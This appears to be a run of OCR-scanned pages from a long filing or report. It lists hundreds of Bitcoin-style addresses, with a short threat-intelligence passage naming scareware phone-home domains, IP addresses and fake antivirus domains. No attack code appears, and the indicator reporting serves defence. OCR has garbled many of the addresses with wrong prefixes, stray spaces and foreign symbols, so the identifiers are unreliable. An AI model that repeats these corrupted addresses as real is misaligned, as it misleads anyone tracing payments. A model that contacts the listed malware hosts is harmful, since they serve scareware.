1KzenP4YHe9iIRUWft9Y L5s8tjindqyWxXWr 
1KZHk4u2ZRrBHdMQTosDhiiCuAfawUA1rR 
1LKzjUSFEDIxQhQqRmZgtix2LWJwLtDw35F 
1KZU8mmEfqZcPtxRV6YSPHg8k2J4m4QUHd 
1KzxAaLLWwMDJUx33sTq5PlwoWdi3eLWVf 
1L159jjuQORxXXLDSFHzq3uZXyQg1ZKr6er 
1LL18pTfWVSJclgEoctuysF8mgpxXhjw3mc2 
LL2ygtaGYWh1U8bduMi3kKtdobmHT3rjbnS 
1L31Unk4yqoseAUyxNhNXHfDfCmsrsYqy3 
1L3CeEXVHdgPso7WjdfGwr9CLmMZ9pRcZPf 
LL3kEqZZzhXcxn1Cq5YAaWyG5t2q8nn9eR 
1LL3uTMC7L3qnUoJQFoyptoAG94P5YaaykG 
1L3xUx6BRtk5vXwJA9pNzz3dbvntXzFddu 
1L491fMneXR8JNdoCRHgyuTHtru4r6HZdP 
1L4DuwPG4z1XC6cKQWjj574zgjg5MTofai 
LL4FfmMYBwMVa27Sq5Qok8nM2tAg4GKnkiHh 
1L4m7zZ1YYLCZZnfeHti¥mu4QDTvtdyYstnt 
1L4owv3YSB46qJStTtpsBqGmKUufle6éiEa 
1L4PgP5n16WsX97LSMGoGtG9wycRbdhRKL 


LL4ti2kwyYqyUdvqdLL2kNMtfyjWR2RyHg 
25134 


1L557z8pDbrdRpvF1TYoodrL6epHraP4cS 
1L5c4F8aTGL3xAYMofwmGYryM6P5V3Gkf] 
1L5FXs3d5sexeMXYPAGSNWWHni9y29UZWE 
1L5JDTO9RVUE6RWZ64KntW2CDamCCwEK2rq 
1L5k9Rd2ERVVMVkhq4HuTWLp236iiGZT6A 
1L5yrY¥6a69y2z0DWr94CcytoBtD41Ykc54 
1L679jjvtkC9Eopg9F7XyTkypBMFpheom| 
LL6BSachpAwYmE4inWe2jn2Rmx7JTWmm9s 
LL6KVFCNMP9x2L6Ji7ysiT3jNczzbbQR4W 
LLONKUnvyJ8ckL6ZzVVFMkRRgEDrTegBkRt 
LL6NWjJRMGcKbeoUmelrQ1imp2c6ZH3kVS9 
LL6QNA76ntWDmagqmfaJMjpTtNZVP6u9SA1r 
LL6ZQUtDN6VYsfw9xv5wBp24HCgm1UyLxg 
1L72MuvESscAHxP6K1Pr6xXggNmH74DCLqQ 
1L790ggrMGE3XAyHnLhbNg78zW6VGZDUm4 
1L7BisPWjZQ7hvXiirDmgydc6zKtFPXANW 
LL7HUNSmHmGh6fL8VZRNtwuqwC3TyyNuE5 
1L7ieDF5a5J13NV9EXCF4sRagiaeUoMtuK 
1L7ND1zQnCpzYa8JTWKi7frxxEbs8dmtZz 
1L7xBY9uq22V3UHtEdPp3DCbWL45TYE6XW 
1L83502)XwMdftcR9rBDQdgGrcs4ntJY9K 
1LL86YJQKHXAFK7GWb48Sk3Yiiy2Q9SKJYN 
1L8FA4RBCM3N2C4iyoWtaVmnC9fhHJMSDv 
LL8hffXaiKAZW8jEj6dRYUNE2HnNCBKKeL8 
1L8jUcLhBRRwWV2cBv5UJugZCsT4oyk83c6 
1L8Ksxr3zYXncLPzxFEHj2F8GZLhnjfPeD 
1L80dZd1vtsRnaaQbyQtEhBPXnibq7gdcn 
1L8RaqYHuD9bSMTWnuD8w5zg9maRisDBSA 
1L8t81tYGLHtPMhPC4MT5LK4H3c3w3dtzo 
1L8tbbo9a8dCVm1lesxFE1S3akhnbenUv4u 
LL8vgbXV2nVToFrjsfx7mMeDUc9IaHUGitQ9 
LL8y84mTUrFtoCoVkiGUgD4LbjkD1lejiCa 
1L967RLpPRWKbYSvQREwu73EumQrmvpSXxfZ 
1L9aFsVfYCT8scUu8bGoiXDagFa2K2FCsg 
LLOKQ2tNW1PgTxAq4VYmWKEn4zBbQ6XVh8 


25135 


1L90RzZ3Wbd20L2F7BarigQmm7iwdsPNe]F 
1L9sL2j398YAcsLdvJGNTHfleMPtwEifL9 
1La814VPKdT1MPG5juuYefWvANdtXZagpx 
LLAGSWFkNu8rfd81CtjJZmhVNYVoxj4i3Bs 
LLailgh2CpRcnSXRb5fn7PwgPZ6t9VF8HM 
LLAjJ4UFZXRPyS4vsm6fwLG6aZDkXHX5dzh 
1LAqzy3budRA4B5moHbKGPDugqbQAJVMY7 
LLaSoRLg5AYs29m3L8jiUBbmtpyjFhxV8D 
LLAxybrCgyTXByxuoMmZ9FvzhMJAFLJ3cw 
LLAYdzRr3ZHQ4QUMw9CuMMAr32uMkUz3XT 
LLaYQobJVdgXVHw2wWWV2o0FLnPKFGPhzTL 
1LB469c8QxjDTGxTz1lvibRXfvohF3hMfBZ 
1Lb7LBS9K2fbiSuLNpQyvKNPeqhGqR7y9 
1LBBCSi1XyAW2ZAZV4qq3Z6qA2qKJDa2LU 
1LbbvvXyZnoagFBbQDXpoyBzvGxXnqeHDZM 
1LbcGoxdoj6Zgq6jNkqkLPZCp84PQjsipW 
1LBd2Ddm9iYBBYvYGgb6wwJ]VsujaHbcEY 
LLBiH1LnJ4x6LWRg33zoup2hBT 6tCCqDfHE 
1LBmb3FJEDMULZUKNA5mHMb2xDUWXxAZD)Jf 
LLbmg9nTbQzQQZxXtpeAkLsaSavCpUSiAes 
LLbQLBjPmcazWEk80pE2c9Cgqq6UUxToyK 
1LLBsTeYbcprzWB4UZ9ZjravZ3J4HrkKHd8T 
LLbYivhxvaevTC20w9 1 hDEQWn4aNviToFFr 
LLCFHLx3hnDPm4FQv11gG8VHjGzC4Ywn4u 
LLCiIEdfdDKq2vqnWEgGSnAl1hABKJeg6cN9 
1LCLQjPDpsuFLbjELq7ggyVlowW4n3kYti 
LLCoEmnUoTNgNnSeSHWM6exCiF2dQEryEQ 
1LcPRPFSTRUc2BwUWV3C8yxY2JmGutDNLZ 
1LCVgxEnuGrsuqoVjoK7WywQ8sPkyz944r 
1LCvoawTkyRpnFRWVX6FqdxqoS1cHpRSGM 
LLcZL3tWSEOUVHQVSSPvX8PTRGi5tpxi8K 
1LCzyNnouxKyzbyiJnc4UAoSGqQvsM42CQ 
1LD4KVExnuitBwVYaLEEsMcDgkDSAa6Yyb 
1LLDAJLFZPd3xoow2biTgowSQmgMywrLLyh 
1LdapDgSdhgXSsRLsmguWr6wYLEuGFK1Gf 
25136 


1LDgSrofPVPBDJtH4uMfsv7Ha9GBQaQGK3 
1LLDHX84kppqaGg89RBYUDz7JrtGdYyNofP 
1LDm4dArel1pHrdfA93PXSrQKyUZ6zejnfc 
1Ldo68fBp12t2KjUGxg370DtAxNmLkcAaF 
1LDrtwGPLLHkzmUWIiI54Y2p3ySZ5A2M4BZc 
1LDtyZB6Q6Mb6x2xFv2JyLebsjkKMjCsPVY 
LLdTZrzr5V9AnFmhTDYzYno7 1EpoodctU2 
1LDus9rBQ7d6h8F4C7K4rL8KQ4XUMcaFoq 
1LDVGx5qbhMxNAxXdhnhj4gbETMzfQ2ewZS 
1LLE46kgaC3FvMz12SojWLCNTDbnBLEciiN 


1Le8DSWm6p7GKH9AQe7bdypmHK827VULh2 


LLe8wdkrvaqjs3)xCTyyTa52MVF9IQRIAO4h 
LLEDTd7krgQzeBmDbhVNam34pafx6qnt38 
1LeEjXbNABCBSqB7oYF9qDJ5iYPLi8180d 
LLegLVX1MM4UPoP4qxkrtcwnF pJkK4pHYBH 
LLEjctgejQUJvaQCSxrHfck5VDryY79yRV6 
1LLEkuBBjesMjRWSPaWg]2KZMCk243rRVAx 
LLeENMNhC5m4f5gmYZZhBQwyx7Rg2DqgRxzZj 
LLEPZXYJvnR61kdHxt1TJXuG3Wc58C4xle 
1LErJeCsHDwnmryPtKtAaj1ZS87Scd7VHK 
LLEZwXxuypkeoVSC5RyoJtdaKsiUDGV4HU 
LLfBpJCKc74yszfNfmXTgwfaLMWn1BQUeS 
LLFcgPuFAWe6QwzpPDNYuv2dxrUi49Li57 
LLFdVtCVfKUVuEAKWWN2q33A7kZtsRKQkF 
1LFeS2iNUEHgUZik5b80T073bq9bhKt9vx 
LLFFxVTmMQ17mR52grrcZGMh9sceMXReqth 
LLfG4fxnTvTzJ86FMWRXoAtUnfFu6MsSuz 
LLfFHDhWy3sgfYAW3kLZkzCRzrW5h5cVV13 
LLFhnYKsDSDy9awZAEK2BQTPffBE3qQbkW 
LLfidbCMED2ibwuup4UJgsDtmG1FCDUuvi 
1LfKGhoRAmgdBsejdb5zHeSBd7wEEBnCue 
LLFL7crKMfZqwkKfccmgJtz9tt2MfLvPd77 
LLFMFfSNoA2XkbyAK8ybSzDjPWHslkdinW 
1LFmuhaSGDcez53dtHJTIN1UDxtynip8wA 
1LfrBKXFuSWGxRs4hmmUtWEy3nEgC758SN 


25137 


LLFTtbq96Kzk2nZecu9qRg4tktyejGPMV6 
1LLfwxDYTqjPkuazKU5GWFiupfpg2jNPqih 
LLFY91pmVw8qqGEcRw4e3A21gmkkdinyZK 
1LG1kzBw62mb557zm6eEpU3Qovs86cBVrvB 
1LG6GohzYB1XWS5FvZ2NeeCgYDDYaEr3fg 
LLGONX9TVUVATF8p1t8eHMnMxHLpDmgwir 
LLgA22EFJLNRETMY1ZH2bQhqVZG6tgmZ4A 
1LGabm3zU5Ri1xnJmMEKK3Pm4GyfEtAmnVZ 
1LGFoDBZBdwyCkBGovjb4MH9YqshMikKBdT 
LLgkEFhXSnVuiwZ2bnhF8zunUg81BGhPFs 
1LgLpmL7eMgdpzPkmsnM6aHJZ74qXo0zg32 
1LGMQRe5DeyVAE5rdVWYpYJHLGepTKZm8X 
LLgRMm2QwdXnL405XXJrj37SVdFa6tmncE 
1LLGSiTn202P4CuDKUjpm4W3EwpLy2xkKEP 
LLh5FJXXZU8MLxVeKm4pqyC2qw5w3VuGRB 
LLHOMT7qKkqfK7ymrsbT4GDMEyFJ5AqRx7 
LLHAfAn764Ybpq8fxBURCzx8w6yXzFvHab 
1LhBEqiCRhAeodiAzDTwBXgSrkKsZg8N8vk 
1LLhCntPjEbologelbMq9kXaYZgiC2BVnJM 
LLHFZ9Vm4ergMY3xYZU4b6svecmDo7JdCR 
LLHiS2bPLU27rCFoeoMM4HwyKWLQ716x7Z 
LLhiUKLL7SMLGLPytUxrHmgo6JptR2jvX7 
LLHMdWT6bqo58pdakmRDpTJ2Aa2B8DxkYY 
LLhPE27reeVMiJRRadWXMWn8814LZMAJFf 
LLHTAEJFHMMWvfmHxJUDy6TqFZpkmgUYSt 
LLHTbtMApEu2LWYkZabZZY7C4QyM3rmtuE 
1LHwzFGRtSrKKmUpWfJ3PG7zxpLihL1K7F 
1LLHYDxoERHUgyoTN3bdWajmRm1WwrWwBBq 
LLIEWMXwjN2NgNLFycCmh3eBuStS54QUZ] 
LLILFIW7 7VHPxg5L5bU1LumebMLArzmwuG} 
LLiX8i3mMcEPNYRT9LWxofDedc9Ndv4Gbov 
LLiIZ29ERP5mN4rdxn2hFHYYuRGpCX4jLDw 
LLj1ZJVHhg5CcFqQqs9gy6JKDZV42C3mMEP 
1LLj37x9sFFdWkkAgoqaEo1VACvKZ9Ar57n 
LLjJ8emPMh9uQov9IrzAY6ZotGRIerGNKYDd 
25138 


1LjD6EDS7fy4HQg3EACg4D1p935iwyURdXS 
LLJkKFAtAKwXgcwP5wKHDPo1NYGYHSBQYi6 
LLIKM8yA2tw5CqnH3qBxzuDgTnzvTpwAyr 
1LJnatiDtUkppy88Ew7r9Xzi0QY5NNt680 
1LjRLHMAXuuk6SvZZPr5pdX2yWUYAQCjGE 
LLJY2bthxZkSqffnwMWTKojSC6JwNs8SSm 
1LK4N1zRjgoeKu9aheMgevkzxgpF1CxREY 
1Lk7tASvfCLmjmc64gTyLoPhRi4fw4vHbV 
1LKAgqx1fFd1Ve12NHPKVLiSgPBkS3jZ4t 
LLkh6Y9VXqjpYQnKSLfwogsknxvhxLeVx1 
LLKi4nmry8mdnc6U3H8fh3SVf8cSGidnvG 
1LLKJeQFkm3t9WFZJ3U3DxRqlYHmQBubU1u 
1LKkrdxJeZrudClen945Lr924DBCy6pmAH 
LLkNAvt]dYjMbhf2ZgDY4JaGaXjafW4jvE 
LLKwnWMYT6LyeiELM2qzhPD72b1KaXXVHj 
1LLK48QmPTxXHhdGSbVVXvDLPPE6x1dsZgz 
LLLmMGdnYF4479suqkK2CgCEzSk641trtvre 
LLLQGtRBDhan2FQGhVzx34ZLB4h8jrLpay 


LLLSyG8ZUQY3F1EVUDCHXEGHuhGkT3D2Gf 


LLMiqaQqMTxM4PV6SXBga7v6MrLP5733YZ 
1LmMM59KZoT7qLyUvYfFha3CUQCYyctAbQ3 
LLMNFBGpfpYjLJRtcxXcFFpC1TPwhYase5 
LLMRLn1ctndkxeP3zd8899MzbjgyWDcMoF 
LLmujNaRgKP29d3D4mRgVHH4jRMySMJotE 
LLmXn3nHjUYg4FHqXMgHoJ9EyntTNcrgHR 
LLMZyscjrABUFwM1kcmeW1g5KRz5Gb60XN 
LLN4CJ9PWbfWak6nGeYiYKYRcxhD8d33qm 
1Ln8TDS3zWtuX7uCGuVdFvRThNQZSEr2ub 
1LnAmeeefYqM3thrGKVsbBJWyvZnigutoK 
1Lnaybz9uLy9BBSeRhzBT3AmJbBu9cCSsQ 
1Lnd43kPra6aSZ898M6E3cuDv9rxgLznqr 
1Lnee6FD51NVLsq18ilhv8DmPos1V8UfYk 
LLnFP5GutTZmimWwjYq6B3Gtg4dnyT8kev 
LLnmUgqpPrDpmr1iiAoJbrcRqp8f7aSYWfw 
LLNngCfrTSYsU7isS91L7BQfDxaCdu8Ejw 


25139 


1LnozotKDPjXxfMPHyRqZthYckHvDcvnNU 
LLnpKINWgJhB9Gyldy2kSg5ptMhZ5R59PD 
LLnroZPbc63nTsbhq25SE17V1tttdeb6VH 
LLnvYXs9AwgQhmFiYfTJLEDokvsinDR5QM 
1Lo1C8q2cvp7Lk7cSHkjJjCmpNeafS19sj 
LLo26prdSmQ16m1w4yTTlyhZ30oM9sGhmcmyY 
LLodPqEBKncqR9SyBU6p7MxMmvFkKQBvigq 
LLojrYpQr4Hb6kPWUa5EkXg7iIETM66gkM9 
LLokaSA7FAPy1DbApb1JdF5J6jmXrujxXUw 
LLPJa9iBYtqTLRyL85JDsjPRv1l3cysvsz4 
LLPp8kGwnhSp60mQssLpM26GWdsSfAk2NA 
1LPq5eLS5NXTykUvk6dLWV9XRMN5eZHGC6 
1LPSpcSAcgP3ZdR78r8m9TGpRP29sSRpQp 
LLPVTbSMoH6L1qmSShKSVMG2dposcNawDw 
LLQfFGWMoAVUbECPp9E2rrLmMgV3RzhkY6h 
LLQgYjznCTPs9ipnSFheU7Fo7Gv3U7jCTR 
LLQjEnu9Jv53QhHWF1lgwwT7bPwoWaQF5LBa 
1LLqLgCJFPFYL9SU6PN7eXc9fzwRtt7LCTD 
1LQMSt254YRcctx7XMdedNmkrzVifGWNL9 
1LLqpgaTASVEvBE2PisZXHGihkbi4gxSNA6 
LLQPLaiAABdpu2cW46hYNV6fFXA9tUakaf 
1LLqspvuS8uzGa6SHwlej8sHpah4EUwfZac 
1LQWe6zbHeTzpBUb9xmWuJKg4gduzKpNrD 
1LR4n7F6az5yZRGPuaxmTn1vbvxhivBKVP 
LLraP8H5wdYgLcr7hjtiZ2DbhNgqxA33so 
LLrbv3JkKGeBJZyUQw5HW2tMdwww2DSkVB 
1LrBYe9Qgd1sW9m6nFxcZ1SKcuSHTzhe6C 
LLREM7bi6WPY9SC)jPf4evrqStVmG8RWdKD 
1LreW2gtpu8RQ80yXwsUkdGN8GG9y7pV5u 
1LLrpv3ENjTDaEkfkE8a1BxS6Rq7u5EcRmL 
1LLrsLg3R3xJyW4Qi7r8N8QwReBt]yaZNyY 
LLRTyKXVWtH5vXHeWameZTBhFyszMZT Waf 
LLrwuY5KktaeVrtsNn9ZZKQFKZXvjnDK5B 
1Lsaqu2zZEBQ19uBwm2hvHS6gEEHMxEZ6He 
1LsDpY6cCPZJ8bdpPsX5f7WRexLcDNEzZo 
25140 


LLsnQVABgX]WYxg5eA08z9pFZBjjpgvMgE 
LLSYQY7yQ6wJMvcufMenxPFRsDFUhnrjHm 
1LLt8ayfomMJ3RYkpNzoCrevgZMmyYUXJatQ 
1Lt8KD7vCeynbwYu3FdR4GZ9ATmnexqqFT 
1LtbrweQQDN30UP2L88pF1DrttVm5Ri4eg 
1LLTcxySnFzmBmh73YLAtyKo6LEJPwAyMT5 
LLTJ 1TycwMuYxoLAokLsmkFhuY3XWHz6m7 
1LtkGZp4uEiYrVUPbsib2RbAj8K4AvcToC 
LLtNFmCwWdDjaE2dTv2BkEJakM2VZuFmaw 
1LtsuSQSddVUhq5TDak6AoyPUgyC1Yctva 
1Ltx4e5i7DiAizeigoxbmkFgrDPSpza9Wv 
LLtzHojj 7AvqGif4ZcdzaNqjbFiqobK7RWo 
LLu2gMvhgjjMnsC2FVDdgSA9chK1G4PSLF 
1LU61iIV8anwCBKzqh8FmN9zvWZCKYrKXM2 
1LU7UuGhyiTyLvzEohcSfuu93aSZM1C3mH 
LLUFSrGg2WDF6MarYHTC16Fxg1jzqbfaMj 
LLug1JJi5SGyAS2VUY3XZtPMMgjsUkjp7i 
LLuh5vAhWPju90aSgTacjeu9HuhaSTEQHF 
1LUq5o0zuouwm96utfLnRdfoWawpCifhvgP 
1LUrcGPsMvy5ukr5zbyJYVdWRb4HtBukeE 
1LUV6meUqtB1lsw6WmjRuEsQé6tsi1cLexvdj 
LLv27zaQWRv9pHntkkDgN2]6Jygdkoe9Hx 
LLv2RpWtUWkC7zRF4Euw5xHWdStnn8gDAb} 
1LVfB66j TOHAV88LDqpTEKTy3jomm9Nrtd 
1LVnPcpDh64JuCbmRtYkF4K1LiIYMEwQhQrC 
LLVpthXYNV2MAB3LD7e3pK9GuY2UThBd72 
LLVQ5VzvaApTWDzqRMHm2QxRBP5vjiKNq9 
LLvSUTGdxyQc9KTcZBzPvR5Pd77YuJT1s2 
1LVu3t7 HNoEApY7RtwwGGNPnS5GCMygaVp 
LLVVsKTq98iIYUMX2ZDeHKvK5 XWuLgQJnWL 
LLVW6U0AsSvMfABXxWiktbWwzdcq9jEmz3 
1LVx7EdSPyT6jRP2UjYWMDANpS5bgcxinV 
LLvy 7zwj7iCatf57HPyonyM6ifAqEe8ZdC 
LLW3tnCyszR2NxWCMsa4hS2rRXRONEz8e2 
LLW5cZnC}]50bXZAUjzRyrzLGves9La9gN 


25141 


1LW6Gank5iuTxFSMvipMQZG1zF5zRupKYm 
LLw8dEPAZrLhRBqLulmbwQDGrCopfz8cwz 
1LWdrMxDkfTyakon11oSU3H4SLWUBNrghL 
1LWGpF8WeBPrD6FPbzBPL5D8dQEQuUEtYF 
1LWoDsPnmY8N8JmbpxqdG1uHfhinSNLEEH 
LLwSj3DpJMVao02XTJgq28G143rzjkCgAb4 
LLWWNiwjgEG4rrPaT XhPBufPjxDUbzpEaq 
LLX2HVPXWE8XXty2RLnN9yHSQhbDKeVQtGs 
1LX2PBbVZRe7QEs8sMGPh2dakrFZPW5E2x 
1LxAlu9JiVcuzdKHEEKSBNbW73aPKNGhNo 
LLxaxhjXFUStCd9ckUVbAArmNaaJjzQbmt 
1LXLZmiXqDPZss6w6wvpdjeHarLNPSpfN5 
1LXSxrUkE1XKDPS3R5Ab8weCxUtxEZES3h 
LLXVQcGuixGFouHjBYXygMwnwVAkn4pSG9 
1LXyb1dS9YT1VgKtunkCNziEn8BL2g4SRj 
1LxYdK9DsLUYzwDkdgbRqQkwf13XbqkaVP 
1LxzqDGuj4hS1CT5WE7xjwajkcYTqNG1D8 
LLy1rSGpeH9heaUCKkJWJKAGbPhteSK3ks 
1LLY7gLSDdHvrhtd4kk11dCMLCbVkTwSiqp 
LLYd45FsVFnM3VjrVApCzGj8tbHu2xrUja 
LLygZmCJt7i69QnUDd8GgpuqwéKxXk5kqNe 
LLYLYysyZby3NDmLb3JFobHKWSZwZcdC93 
LLyPebzqWwzcAWjUqSmUAvi3ZQMy65Z3zYc 
LLyQHbxPHEZWTxRyFybMfPn8fZFaDPJApn 
LLyRNaf50vW8Dv4WDmnhmj9uVZ6jJniguCl 
LLyxGrtBKJZA41gPEL3XcgJx8sGEw9RSAL 
1Lz3fm1lLybCGSHsnvCs5dusTWYvFUuzsvQ 
1Lz3JzZYc8SJDMkqmKmTUTVKHUwbs8xW2h 
1LLZ4F 1iJHcVyETVb11tsECcCvfPeAk6yKe 
1Lz51tbn61WjpFWxFjJMTZQboCdKZVF8RRu 
LLZfuFN5JSAEGejn9CEM8ArYAWqMw9h6vs 
1LZj4epoiekKEMwTZS5EaCN7o0Sz8gCmKVNC 
1LZko6J3RDoDxPnQpVtyukKYmafX7tuUpxL 
1LLzLSzqJvc4xua5VNf5nJpQ4Mqa29iFZVP 
LLZMTXMKVYaZDsnDZUjqZaqmezcw3rPFFm 
25142 


b2b-forums.cn 
beforeyourdestiny.cn 
bestvanillaresorts.cn 
consensualartcn 
gazsnippets.cn 


goldensunshine.cn 


guidetogalary.cn 78.46.0.0/15 ——»__“_>_ AS _ gy 524940 


mywatermakrs.cn A 78.46.201.89 


personalrespect.cn 


N 


A static.89.201.46.78.clients. your-server.de 


rondo-trips.cn 5 
securedvirusproscan.com 
snowboard2009.cn 
steplessculture.cn 
vipsoccermanager.cn 


yourholidaytoday.cn 


Sampled scareware from the last 24 hours phones back to mineralwaterfilter .com - 
78.46.201.90. Parked there are also: june-crossover .com; goldmine-sachs .com; mo- 
mentstohaveyou .cn. More sampled scareware phones back to a new domain Phones back 
to pencil-netwok .com (94.102.48.31), parked there are the rest of the phone back locations 
for the rest of the scareware such as mineralwaterfilter .com; june-crossover .com; goldmine- 
sachs .com; bestparishotelsnow .com 


A second sampled scareware phones back to a different location - 92.241.176.188. Parked 
there are the rest of the domains in their scareware portfolio: 

bestscanpc .org 

bestscanpc .biz 

downloadavr2 .com 

downloadavr3 .com 

trucount3005 .com 

antivirus-scan-2009 .com 

antivirusxppro-2009 .com 


2517 


LLZVUYk3dgyVqXDU2j8s9yv24grhXk65Xs 
1M15qqTdCZJRBj6TdqMovNb91SGrVvD7vSG 
1M1i8MHDCwpRYy6uLvW8XxEPNtgGthi8qt 
1M249DgSUKTFMj43ZwwkKTdh5KNMBnhpE3u 
1M2512aqssjpkKQH41m3VqufaExH5LxXjUjm 
IM28p2rHqU7MqxWUyzRFixXp3NCCPKoLSy7 
1M2CZtuDASb7yGXD2UDcm7PKnNxUtrBvxi 
L1M2qSAuCd3WvTkSSjazqUXML5pxmPGppEM 
1M36touFkLFmcgV42xxhxRnhFXJc6pVdUW 
1M3EXEd6 To2A3GXzreacZdQspV8KNDpT8a 
LM3ncN1nYNtMf4SWwT9QeJtcnA3yW6eDimmn 
IM3QgfL3shWN4CjPBGptqz62KT5uQjRGyy 
LM3ttDgALfQs9o0Grrr8asSD5DUtUfLZ89X 
LIM3UjeghnDU8aMC3VHfZ8UaF4g23Tdc51w 
IM3UwYkwxqR66BmzvpLBqwojysUcrcv4B5 
1M43iG3wYebfSD7nV7h6k96ZqP3SDSHEXf 
1M4a4YsADkFopQEi96Fy3SZAyRfTU4U89t 
LM4FjdgSci35iTx5NDei2WS3vZbcMasmoS 
1M4kD7EqYjoF7dxbrxLzWpurhsFfAGvyaXx 
1M4MoZwcjtrGz92Ah4casjGHRIWV5VCbkM 
1M4ukfAUNW24jdTREMRDtuKsnjQRByBLY 
1M4X2xCtvRT6BmPuNjyxQrDhkqd6xZATh7 
1M4Yxui48vkPPaw83FaCpPnStqSeUqQPSN 
1M570KW5sPuBmErPidVJs8PCXWCEPkPagz 


LM5EdUSGPXuKZ247n9MDvmNuP3mL3T5qBb 


1M5gCrkMEiLHcwxGKVoY3VYRQrVLiyUQan 
LIm5N9jLYDKMM54gGasptHBTW422jrXRhF 
1M5naXqFnhaFBcxJEBM7ocsZmwyNoBA5pr 
LM5Y5UgTBSBvZNf5ZBgvgudqxglT9vVt9JB 
1M61wHwRa/73uFufXdSEeBb lyCWrbBexAYd 
1M64GDeUyXogGzV6PPAYT XNRHMmV6ixWjUp 
1M656VnWtQ)XvJHRMdDi2woRCy35L94a6F 
1M69qZx5D1jduKjmA8HgD6s1RkKZMKGQrLx 
L1M6mdTnXhXMRtVyo3yQVXsVJbU2QFwhLy4 
LM6piyCpJdRgZzswChBoi3E8ijyg8Dfgmx 


25143 


L1m6SuNbsAU7iIGWPq6PyZMalntdyCATGx} 
1IM6Y34TfaxlfoTuv6ZFyjkKRF4iVa6G29Tr 
LM7i6voMAWqmY2MBazXa4LetPfHhS9k2uw 
1M7iKQbWwWLrKLZL8P2evFkF3YkSHNaBGvn 
1M7ju97337qxBiatgeZH61lejkasyx6Wpja 
1M70G8x4bBYH5fmNXB90DADweE23ASGBDx 
LM7qtnWNqZMNXtPXTfHhGQ9ZWHdrynuQMm 
1M7SXfFt76QtZEVqLLRR98rd8zJ6EFhyLF 
LM7tpx4htlm4NxetTvVGWC8moh2g]pKnueA 
LM8BpN1yftCGsbSJkbu1P8]JMrpkhKpy8G 
LM8dBu25CfYgvfiAnkVnwGsCss2MqgCys3 
LIM8FEMYVKg57cz43mFe6p8st5FKUHLWfmLi 
1M8JlonxV6zjvinamqheiMXgPeawpfPFKV 
IM8TM2yUKDo04KmJVwdC9DBXjrGyCz5ekT7 
1M8Zg3tK45PgRb67muKfDLuYrzrfEW9337 
LM9g8bRdxhNC5HKqw9mP2ZSG7JY1c3TkxU 
LM9iINrXKeZ3wssr4NKwNjsSjDn8dtxXxsui 
IM9kYkwGTUBRZnkKfxWulAYqaZkSfaSpMmA 
1MalEjuu3ZuJFg3UeiTwd6aFb200xJTEpo 
1MA2RLcdspDXSmRnyFCYSWUCXy8aFAtro4 
1Ma3eRJ5ZV6N53T2d7MsdAzZJEK6D8xpGF8 
LMA9SAHywnhWwalZhovU49RGph1QFHM9gg 
1Maa7uwWYzcwBkPz4NXg1RNjs7dVwkrwYS 
LMACo2KEGsdBcJ9fnTo5VYA7 XfjdMAo6Q6 
1MacpTr5fupVUbXTY3sctTtbhQ6SHH3zs3 
1MaHp5hJm8Le2vSCckrzY2CbKCwSWpVvon 
LMAhgFyVYr1p3Ztx731KwLalDw3xfrM19H 
LMAKh1leqqFsHfd9T5Fqexkrcy1PsuRBznh 
LMAKN5rJXYKECKTiVP8Hy8fWp1zt4LvtuY 
LMAMdhPAr22P62kWEpbKjPVr59g5ZTRCCy 
1MAoQ7wNHUDF8BFSZ4vTyDMyysvE6HCwGa 
1MArYrzB5zF9OBFsSZKRqezCZZJzRyy1Gzs6 
1Max55c5q130nFYFr8UtbtHqJMg9XrnAtr 
LIMb1PJTVMRvfgAfZPad3nQa2NVRAA33NcG 
1MB2fP77DLWpywjVjieBdNEYcn7FCFa42} 
25144 


IMb3KaTMt8BfSTsxX7nYP2h9bm4TGvYUHmo 
1MB7KvqLKuryieB9rmGjxX1bdJikbQdjZaw 
1MbaeGG5mLU9Wapj35YS2FSMMvP5MNSjte 
IMBd3SgthS2sTVLvmXAeCZnJhwkj4iEXKQ 
LMBDVuNpqBPKCtN1SGR9C1vwGQJUKqbr37 
IMBgvxQGeD2TQwPkxLPnv8gfyXsu5mhgXs 
LMBGxCyMKgL4Bo2kbUxkHnoevwWQm5]JVzU 
IMbGZhTg16KRZ6uBxBYABJjRxCf12Voi3Z 
LMbjQXjKQmcR7MJMPGbfxBXKEi7mBjW7im 
LImBRdJ28aTBhTE5vcALnyglEu9ixy3TNZ 
LIMbRtALXLn5MVXRzS7AzVzEntqiLNkYsMV 
IMBRtYV1BZf208GaDP1m9rPPRWVbrWUd3R 
LIMBvJb4GAZiIMCmMUh5T4DoYMTxafVJ2SdJ2 
LMBW3KhutL4ZepahCseBiE2VWw8XSEvaSo 
1Mc33g/7br5vii6cle6 7mMeXbdNHMpZHYss2 
IMC3xjinduwtNVf7LV8jzeLXYk8n9nnNCL 
1McAe2P7Xx9ZwriPBawiaqFhQfgCTgpBiG 
1Mcepg5TxoMxNqPXBLEW5PxXontTuJj5hilpU 
LMCHBZVME9rrzVsPnmt1itmx9RR4V5wruD 
IMCkSzdRVyNYdn2pWYJo7WR6Bwg9TjZgqhv 
IMCRhXBLLN2GenSKnaZNnGkVfEwND8PDTH 
1LMcrwm3D7MNVA67hgtYuHSkw8QkGJg2w9p 
ImcupdipEXEhB3T7RAzvFFJKp195RMkEg 
LMcuQsqxhcuDTLsJci8mH6ek3zmrj4jVyn 
IMD3sTXBHMntduk5MbMZwvWcn7zXUwwu6A 
IMDbtC57s3RDnh3xXh8sfg3uhAzwD5sYKuC 
1MDkt7sd5rR6QuKf9eEjJGHgbN9IQg4fPTR5 
LMDnMYtbApeiqpLCPbWF6kuExv8Tfcg/7Tb 
LMdnT44UhYZrGVQtZSVdZqTCbyC5fpoQCc 
1MDox45rpWprg663BKNuY91XH9itiKczpw 
LMDuh4zawrL7pjKC121aUviu4HkKRCDNiE8 
1MdvJ5uuGidEPsv7hgrGSQ9iodqZDNYfJ7 
1Me14rFmimTj7F1jzQ111BsRnav5Le3MRq 
LMEBFpMFNMw2BMb59EqwGMGE1TN9ubk3jo 
LMebjAnBB2f89SjkteWLVrkjChKS8JwiQf 
25145 


Imepdy4GdUZi3haBXtyoFdMaMcKmArgwN 
1MeyKbXn3AugknwmdDGieK6677n7KAn9Ee 
1MF39u7tA5e2CKAo5qPmpXz4KDFA8Gmc43 
LMf5fivaEwpdEF2LnWHS9FT9CV1w3f6FrS 
LMf8Hn3FixMjKy9Z3P9pDgYdKjxjaX3NHg 
1MFafS8pGgflKYAgKkYWVAFebpZ7WMVvra 
LIMfh30XMFkQs6rxt9pYutec8T 9tkKhUA74k 
LIMFmxMQS8Y5rR3YJutTqMgYoNEGWG9Pki8 
L1MfNaNbuwAU1zdywv9DaShCCdKbDY2nzjJj 
